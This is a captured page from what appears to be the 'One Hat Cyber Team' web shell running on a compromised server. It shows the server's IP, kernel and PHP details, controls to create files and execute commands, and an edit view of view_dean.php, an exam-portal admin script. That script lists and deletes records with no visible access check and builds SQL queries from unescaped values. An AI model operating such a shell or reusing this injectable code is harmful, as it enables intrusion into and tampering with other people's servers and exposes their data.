One Hat Cyber Team
Your IP :
216.73.216.84
Server IP :
50.6.229.107
Server :
Linux server.hostburly.com 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64
Server Software :
Apache
PHP Version :
8.2.30
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
andjemzt
/
nportal.andjemztech.com
/
examAdmin
/
Edit File:
view_dean.php
<? session_start(); include("inc/header.php"); //include_once("../inc/fxn.php"); $officer_id=$_SESSION['officer_id']; //$rw=GetMany("admin",$officer_id,"id"); //$branch_id=$rw['branch_id']; ?> <table border="1" cellpadding="5" cellspacing="0" width="70%"> <tr> <td>S/No</td><td>Names</td><td>Edit profile</td><td>Delete</td> </tr> <? $sql="SELECT * FROM adminapplication"; $result=mysql_query($sql); $sno=0; while ($row=mysql_fetch_array($result)){ $sno++; $title=$row['title']; $surname=$row['surname']; $othernames=$row['othernames']; //$school_name=get22("universities",$row['school_id'],"id","name"); $dean_id=$row['id']; ?> <tr> <td><? echo $sno ?></td><td><? echo "$title $surname $othernames" ?></td><td><a href="edit_dean.php?dean_id=<? echo $dean_id ?>">Edit Records</a></td><td><a href="delete_dean.php?dean_id=<? echo $dean_id ?>" onClick="return confirm('Are you sure you want to delete');">Delete</a></td></tr> <? } ?> </table> <? function get22($table,$value,$field,$output){ $sql=mysql_query("SELECT * FROM $table WHERE $field=$value"); $row=mysql_fetch_array($sql); return $row["$output"]; } include("inc/footer.php") ?>
Simpan